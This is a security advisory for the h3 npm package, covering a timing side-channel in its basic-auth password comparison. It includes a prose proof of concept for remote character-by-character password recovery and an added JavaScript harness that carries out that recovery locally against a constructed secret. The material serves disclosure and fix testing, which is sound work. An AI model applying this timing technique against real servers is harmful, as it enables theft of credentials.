GHSA-26F5-8H2X-34XH

Vulnerability from github – Published: 2026-03-18 16:17 – Updated: 2026-03-20 21:27
Summary
h3 has an observable timing discrepancy in basic auth utils
Details

Summary

A timing side-channel vulnerability exists in the requireBasicAuth function because the user-supplied password is compared with the configured password using the ordinary string inequality operator (!==), whose running time depends on where the two strings first differ. An attacker who can measure the server's response time can deduce the valid password character by character, which defeats the protection a long, complex password would otherwise provide against guessing.

Details

The vulnerability is located in the requireBasicAuth function. The code performs a standard string comparison between the user-provided password and the expected password:

if (opts.password && password !== opts.password) {
  throw autheFailed(event, opts?.realm);
}

In V8 (and in most other runtimes), string equality is evaluated "fail fast": the engine first compares the two lengths and then walks the contents, stopping at the first mismatched position. The !== operator therefore evaluates to true as soon as a mismatch is found, without examining the rest of the string.
  • If the first character is wrong, the comparison returns immediately.
  • If the first character is correct but the second is wrong, it takes slightly longer.

By statistically analyzing these minute timing differences over many requests, an attacker can determine the correct password one character at a time. The per-character difference is on the order of nanoseconds on a warm JIT, so it has to be amplified by repetition and separated from event-loop scheduling and network noise; the exact granularity (whether the content comparison proceeds byte by byte or in larger chunks) is an engine implementation detail.

PoC

This vulnerability is exploitable in real-world scenarios without direct access to the server machine.

To reproduce this, an attacker sends two HTTP requests (or bursts of requests) at the same moment:
  1. Request A: carries a password known to be wrong from the first character onward (e.g., AAAA...).
  2. Request B: carries a password whose first character is the current guess (e.g., B...).

By measuring the time-to-first-byte (TTFB) or the total response time of these concurrent requests, the attacker can cancel out most of the network jitter, since both requests travel the same path at the same time. If Request B consistently takes longer to return than Request A, the guessed first character is confirmed. The process is then repeated for the second character, and so on. Tests confirm this timing difference is statistically consistent enough to recover credentials remotely.
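The harness below is an added example, not part of the advisory or of h3. It runs the PoC's differential measurement in-process instead of over the network: every candidate for the next character is timed over a batch of comparisons, candidates are interleaved within each round so that slow drift affects all of them alike, and the median per-call cost ranks them. The secret, the alphabet, the filler byte and the function names are all constructed here.

```javascript
// Added example (not from the advisory or from h3): the PoC's differential
// measurement run locally. Each candidate next character is timed over a
// batch of comparisons, candidates are interleaved within every round so that
// GC pauses and frequency changes hit them all alike, and the median
// per-comparison cost is used for ranking. Secret and alphabet are constructed.

const SECRET = "hunter2"; // constructed: the configured password under attack
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789";

// The comparison under test, in the advisory's `!==` shape.
const unsafeCompare = (supplied, expected) => !(supplied !== expected);

// Guesses are padded to the secret's length with a filler byte: the engine
// compares lengths before content, so a shorter guess would exit before the
// first character is ever examined (the attacker must learn the length first).
function candidateFor(nextChar, knownPrefix, length) {
  return (knownPrefix + nextChar).padEnd(length, "\u0000");
}

function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const m = s.length >> 1;
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// Returns candidates for the next position sorted from slowest (most likely
// correct, since more of the prefix matched) to fastest.
function rankNextCharacter(compare, secret, knownPrefix, alphabet, rounds = 200, batch = 2000) {
  const samples = new Map([...alphabet].map((c) => [c, []]));
  let sink = 0; // consumes the comparison results so the loop is not optimised away
  for (let r = 0; r < rounds; r++) {
    // rotate the starting candidate each round so no candidate always runs first
    const order = [...alphabet];
    for (let i = 0; i < r % order.length; i++) order.push(order.shift());
    for (const ch of order) {
      const guess = candidateFor(ch, knownPrefix, secret.length);
      const t0 = process.hrtime.bigint();
      for (let i = 0; i < batch; i++) sink += compare(guess, secret) ? 1 : 0;
      const t1 = process.hrtime.bigint();
      samples.get(ch).push(Number(t1 - t0) / batch); // nanoseconds per comparison
    }
  }
  if (sink < 0) throw new Error("unreachable"); // keeps `sink` live
  return [...samples]
    .map(([char, ns]) => ({ char, medianNs: median(ns) }))
    .sort((a, b) => b.medianNs - a.medianNs);
}

// The advisory's iterative procedure: fix the slowest candidate at each
// position and move on. Whether this actually reproduces SECRET depends on
// the machine and its noise level; the method is the point.
function recoverByTiming(compare, secret, alphabet, rounds, batch) {
  let prefix = "";
  while (prefix.length < secret.length) {
    prefix += rankNextCharacter(compare, secret, prefix, alphabet, rounds, batch)[0].char;
  }
  return prefix;
}

// Stand-alone run: ranking for the first position only, with modest sample counts.
console.log(rankNextCharacter(unsafeCompare, SECRET, "", ALPHABET, 50, 500).slice(0, 3));
```

Running the same harness against a constant-time comparator should produce a ranking whose medians differ only by noise, which makes it a cheap regression check for a fix; increasing `rounds` and `batch` is the local equivalent of sending more request pairs over the network.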

Impact

This vulnerability allows remote attackers to recover passwords. Network jitter makes the attack difficult over the public internet, but it is far more effective on local networks or in cloud environments where the attacker is co-located with the server. It reduces the work of cracking a password from exponential in its length (guessing the whole string at once) to linear (guessing one character at a time, roughly alphabet size multiplied by length attempts). Versions from 2.0.0-beta.0 up to and including 2.0.0-rc.8 are affected; the fix shipped in 2.0.1-rc.9.


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.0-rc.8"
      },
      "package": {
        "ecosystem": "npm",
        "name": "h3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0-beta.0"
            },
            {
              "fixed": "2.0.1-rc.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33129"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-18T16:17:58Z",
    "nvd_published_at": "2026-03-20T10:16:19Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nA Timing Side-Channel vulnerability exists in the `requireBasicAuth` function due to the use of unsafe string comparison (`!==`). This allows an attacker to deduce the valid password character-by-character by measuring the server\u0027s response time, effectively bypassing password complexity protections.\n\n### Details\nThe vulnerability is located in the `requireBasicAuth` function. The code performs a standard string comparison between the user-provided password and the expected password:\n\n~~~typescript\nif (opts.password \u0026\u0026 password !== opts.password) {\n  throw autheFailed(event, opts?.realm);\n}\n~~~\n\nIn V8 (and most runtime environments), the `!==` operator is optimized to \"fail fast.\" It stops execution and returns `false` as soon as it encounters the first mismatched byte.\n* If the first character is wrong, it returns immediately.\n* If the first character is correct but the second is wrong, it takes slightly longer.\n\nBy statistically analyzing these minute timing differences over many requests, an attacker can determine the correct password one character at a time.\n\n### PoC\nThis vulnerability is exploitable in real-world scenarios without direct access to the server machine.\n\nTo reproduce this, an attacker can send two packets (or bursts of packets) at the exact same time:\n1.  **Packet A:** Contains a password that is known to be incorrect starting at the first character (e.g., `AAAA...`).\n2.  **Packet B:** Contains a password where the first character is a guess (e.g., `B...`).\n\nBy measuring the time-to-first-byte (TTFB) or total response time of these concurrent requests, the attacker can filter out network jitter. If Packet B takes consistently longer to return than Packet A, the first character is confirmed as correct. This process is repeated for the second character, and so on. Tests confirm this timing difference is statistically consistent enough to recover credentials remotely.\n\n### Impact\n\nThis vulnerability allows remote attackers to recover passwords. While network jitter makes this difficult over the internet, it is highly effective in local networks or cloud environments where the attacker is co-located. It reduces the complexity of cracking a password from exponential (guessing the whole string) to linear (guessing one char at a time).",
  "id": "GHSA-26f5-8h2x-34xh",
  "modified": "2026-03-20T21:27:48Z",
  "published": "2026-03-18T16:17:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/h3js/h3/security/advisories/GHSA-26f5-8h2x-34xh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33129"
    },
    {
      "type": "WEB",
      "url": "https://github.com/h3js/h3/pull/1283"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/h3js/h3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/h3js/h3/releases/tag/v2.0.1-rc.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "h3 has an observable timing discrepancy in basic auth utils"
}
